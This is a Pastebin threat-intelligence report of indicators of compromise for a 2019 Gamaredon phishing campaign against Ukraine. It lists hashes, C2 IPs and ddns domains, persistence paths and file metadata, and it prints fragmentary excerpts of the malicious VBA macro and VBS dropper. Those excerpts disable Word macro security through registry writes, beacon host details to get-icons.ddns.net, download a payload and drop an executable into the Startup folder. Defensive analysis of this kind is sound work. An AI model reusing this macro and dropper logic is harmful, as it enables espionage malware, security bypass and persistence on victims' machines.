Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Gamaredon #xml.rels #macro #WSH
- https://pastebin.com/Vhb4KF5L
- FAQ:
- https://radetskiy.wordpress.com/2019/11/19/ioc_gamaredon_181119/
- https://www.malcrawler.com/russias-gamaredon-group-new-cyber-espionage-campaign-against-ukraine/
- https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html
- https://whotippedmycows.com/gamaredon-targets-ukraine-using-cve-2017-0199/
- https://malpedia.caad.fkie.fraunhofer.de/actor/gamaredon_group
- attack_vector
- --------------
- email attach .zip > .docx > xml.rels > GET .dot > macro > DROP vbs > WSH > 3d stage ..
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a
- File name провадження.docx [Zip archive data, at least v2.0 to extract]
- File size 49.8 kB
- SHA-256 e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8
- File name apu[1].dot [Composite Document File V2 Document, Little Endian, Code page: 1251]
- File size 47.1 kB
- SHA-256 39c6884526e7b7f2ed6e47b630010508bb5957385eccf248c961cbd5bcb802c6
- File name templates.vbs [Little-endian UTF-16 Unicode text, with CRLF, CR line terminators]
- File size 8.9 kB
- activity
- **************
- PL_SCR 141.8.195.60 win-apu.ddns.net [from settings.xml.rels]
- C2 2.59.41.5 get-icons.ddns.net [from templates.vbs]
- netwrk
- --------------
- [http]
- 141.8.195.60 win-apu.ddns.net GET /apu.dot HTTP/1.1 Mozilla/4.0
- 2.59.41.5 get-icons.ddns.net GET /Host_ID//autoindex.php HTTP/1.1 Mozilla/4.0
- comp
- --------------
- wscript.exe 3684 TCP localhost 49419 vds-ce34203.timeweb.ru http
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- [another context]
- C:\Windows\system32\wbem\wmiprvse.exe -Embedding
- [another context]
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs"
- persist
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 18.11.2019 16:17
- templates.vbs
- c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\templates.vbs
- drop
- --------------
- C:\tmp\Temporary Internet Files\Content.IE5\3YAVTBAP\apu[1].dot
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\templates.vbs
- @ @ @
- C2 (other domains, previous): from whotippedmycows.com and malcrawler.com
- --------------
- unhcr.ddns.net
- rnbo-ua.ddns.net
- network-crash.ddns.net
- checkhurl.site
- get-icons.ddns.net
- bitvers.ddns.net
- shell-sertificates.ddns.net
- bitread.ddns.net
- sv-menedgment.ddns.net
- lookups.ddns.net
- libresoft.ddns.net
- document-write.ddns.net
- suipost.ddns.net
- document-listing.ddns.net
- list-sert.ddns.net
- military-ua.ddns.net
- const-gov.ddns.net
- my-certificates.ddns.net
- checkhurl.fun
- libre-boot.ddns.net
- kristo-ua.ddns.net
- templates.hopto.org
- checkhurl.website
- constructor-word.ddns.net
- creative-office.ddns.net
- kornet-ua.ddns.net
- duktas-dde.ddns.net
- message-office.ddns.net
- unhcr.ddns.net
- shell-sertificates.ddns.net
- network-crash.ddns.net
- message-office.ddns.net
- list-sert.ddns.net
- libresoft.ddns.net
- kristo-ua.ddns.net
- kornet-ua.ddns.net
- bitread.ddns.net
- micro-office.ddns.net
- get-icons.ddns.net
- checkhurl.space
- checkhurl.info
- checkhurl.fun
- checkhurl.site
- underlord.site
- underlord.fun
- bitvers.ddns.net
- sv-menedgment.ddns.net
- lookups.ddns.net
- document-write.ddns.net
- suipost.ddns.net
- document-listing.ddns.net
- military-ua.ddns.net
- rnbo-ua.ddns.net
- const-gov.ddns.net
- my-certificates.ddns.net
- libre-boot.ddns.net
- underlord.space
- templates.hopto.org
- checkhurl.website
- constructor-word.ddns.net
- creative-office.ddns.net
- duktas-dde.ddns.net
- @ @ @
- metadata of 1s docx
- --------------
- File Size : 49 kB
- File Modification Date/Time : 2019:11:18 12:19:29+02:00
- File Access Date/Time : 2019:11:19 01:52:13+02:00
- File Inode Change Date/Time : 2019:11:19 01:51:55+02:00
- File Permissions : rw-rw-r--
- File Type : DOCX
- File Type Extension : docx
- MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
- Zip Required Version : 20
- Zip Bit Flag : 0x0006
- Zip Compression : Deflated
- Zip Modify Date : 1980:01:01 00:00:00
- Zip CRC : 0x5d2e7c58
- Zip Compressed Size : 176
- Zip Uncompressed Size : 247
- Zip File Name : customXml/item1.xml
- Template : UrbanResume.Dotx
- Total Edit Time : 2 minutes
- Pages : 1
- Words : 111
- Characters : 635
- Application : Microsoft Office Word
- Doc Security : None
- Lines : 5
- Paragraphs : 1
- Scale Crop : No
- Heading Pairs : Title, 1
- Titles Of Parts :
- Company : Reanimator Extreme Edition
- Links Up To Date : No
- Characters With Spaces : 745
- Shared Doc : No
- Hyperlinks Changed : No
- App Version : 12.0000
- Creator : ШУРИК
- Last Modified By : ШУРИК
- Revision Number : 3
- Create Date : 2019:11:18 07:03:00Z
- Modify Date : 2019:11:18 07:03:00Z
- @ @ @
- metadata of 2n dot
- --------------
- File Size : 46 kB
- File Modification Date/Time : 2019:11:06 14:39:21+02:00
- File Access Date/Time : 2019:11:19 01:51:58+02:00
- File Inode Change Date/Time : 2019:11:19 01:51:58+02:00
- File Permissions : rw-rw-r--
- File Type : DOT
- File Type Extension : dot
- MIME Type : application/msword
- Title :
- Subject :
- Author : ШУРИК
- Keywords :
- Template : apu.dot
- Last Modified By : ШУРИК
- Revision Number : 17
- Software : Microsoft Office Word
- Total Edit Time : 1.0 minutes
- Create Date : 2019:09:11 04:30:00
- Modify Date : 2019:11:18 12:18:00
- Pages : 1
- Words : 2
- Characters : 16
- Security : None
- Code Page : Windows Cyrillic
- Company : Reanimator Extreme Edition
- Lines : 1
- Paragraphs : 1
- Char Count With Spaces : 17
- App Version : 12.0000
- Scale Crop : No
- Links Up To Date : No
- Shared Doc : No
- Hyperlinks Changed : No
- Title Of Parts :
- Heading Pairs : ÐазваМОе, 1
- Comp Obj User Type Len : 39
- Comp Obj User Type : Äîêóìåíò Microsoft Office Word 97-2003
- @ @ @
- drop-apu[1].dot [macro]
- --------------
- VBA MACRO ThisDocument.cls
- in file: f2.dot - OLE stream: u'Macros/VBA/ThisDocument'
- +----------+--------------------+---------------------------------------------+
- |Type |Keyword |Description |
- +----------+--------------------+---------------------------------------------+
- |AutoExec |Document_Open |Runs when the Word or Publisher document is |
- | | |opened |
- |Suspicious|CreateObject |May create an OLE object |
- |Suspicious|CreateTextFile |May create a text file |
- |Suspicious|ADODB.Stream |May create a text file |
- |Suspicious|SaveToFile |May create a text file |
- |Suspicious|Environ |May read system environment variables |
- |Suspicious|Shell |May run an executable file or a system |
- | | |command |
- |Suspicious|WScript.Shell |May run an executable file or a system |
- | | |command |
- |Suspicious|Write |May write to a file (if combined with Open) |
- |Suspicious|Open |May open a file |
- |Suspicious|Windows |May enumerate application windows (if |
- | | |combined with Shell.Application object) |
- |Suspicious|Chr |May attempt to obfuscate specific strings |
- | | |(use option --deobf to deobfuscate) |
- |Suspicious|Xor |May attempt to obfuscate specific strings |
- | | |(use option --deobf to deobfuscate) |
- |Suspicious|AccessVBOM |May attempt to disable VBA macro security and|
- | | |Protected View |
- |Suspicious|VBAWarnings |May attempt to disable VBA macro security and|
- | | |Protected View |
- |Suspicious|MSXML2.XMLHTTP |May download files from the Internet |
- |Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
- | | |used to obfuscate strings (option --decode to|
- | | |see all) |
- |Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
- | | |used to obfuscate strings (option --decode to|
- | | |see all) |
- |IOC |http://get- |URL |
- | |icons.ddns.net/ | |
- |IOC |templates.vbs |Executable file name |
- +----------+--------------------+---------------------------------------------+
- @ @ @ [f2.dot _ VBA]
- Private Sub Document_Open()
- Dim GoihGFG
- GoihGFG = "Set WShell=CreateObject(""WScript.Shell"")"
- Set rSwistz = CreateObject("WScript.Network")
- Set MHHEFbR = CreateObject("Scripting.FileSystemObject")
- jSsmRUH = MHHEFbR.Drives(Environ("SystemDrive")).SerialNumber
- NlnQCJG = rSwistz.ComputerName
- dqEBCgG$ = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _
- "\Word\Security\"
- CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "AccessVBOM", 1, "REG_DWORD"
- CreateObject("WScript.Shell").RegWrite dqEBCgG$ & "VBAWarnings", 1, "REG_DWORD"
- uRDEJCn = Hex(jSsmRUH)
- ZWyEwtz = "http://get-icons.ddns.net/" & NlnQCJG & "_" & uRDEJCn & "//autoindex.php"
- fQCBSyj = AppPaths + "\Microsoft\Windows\Start Menu\Programs\Startup\""+" + "RandStrinh" + "+"".exe"
- AREdQgT = AppPaths + "\""+ RandStrinh +" + """.txt"
- LaIPBvl.Write "Dim GenRandom" + vbCrLf
- LaIPBvl.Write "Const FoRandString = ""abcdefghijklmnopqrstuvwxyz0123456789""" + vbCrLf
- LaIPBvl.Write "If f.Size < 11485 Then f.Delete" + vbCrLf
- LaIPBvl.Write "Set HCJySbu = GetObject(""WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem"")" + LaIPBvl.Close
- End Sub
- @ @ @ [templates.vbs]
- Function ibiexCm(URLA)
- On Error Resume Next
- Set DfnssAH = CreateObject("MSXML2.XMLHTTP")
- Set PuchGYo = CreateObject( "Scripting.FileSystemObject" )
- Function RandomString(ByVal palvados)
- Dim GenRandom
- Const FoRandString = "abcdefghijklmnopqrstuvwxyz0123456789"
- Randomize
- For i = 1 To palvados
- GenRandom = GenRandom & Mid(FoRandString, Int(36 * Rnd + 1), 1)
- Next
- Set KHQCFif = CreateObject("Scripting.FileSystemObject")
- Set jKFUmKe = CreateObject("ADODB.Stream")
- jKFUmKe.SaveToFile "C:\Users
- ame\AppData\Roaming\"+ RandStrinh +".txt"
- Set f = LHswYNG.GetFile("C:\Users
- ame\AppData\Roaming\"+ RandStrinh +".txt")
- If f.Size < 11485 Then f.Delete
- errResult = Encode( "C:\Users
- ame\AppData\Roaming\"+ RandStrinh +".txt", "C:\Users
- ame\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+RandStrinh+".exe", arrdqEBCgG )
- WScript.Sleep 6400
- WScript.Sleep 181040
- save ibiexCm("http://get-icons.ddns.net/Host_ID//autoindex.php")
- If PuchGYo.Fileexists("C:\Users
- ame\AppData\Roaming\"+ RandStrinh +".txt") Then PuchGYo.DeleteFile "C:\Users
- ame\AppData\Roaming\"+ RandStrinh +".txt"
- YDJncEX = 0
- Dim HCJySbu, aCRoeaK, aCRoeaKSheck
- Set HCJySbu = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
- Next
- End If
- End With
- Loop
- # # #
- https://www.virustotal.com/gui/ip-address/2.59.41.5/relations
- https://www.virustotal.com/gui/ip-address/141.8.195.60/relations
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement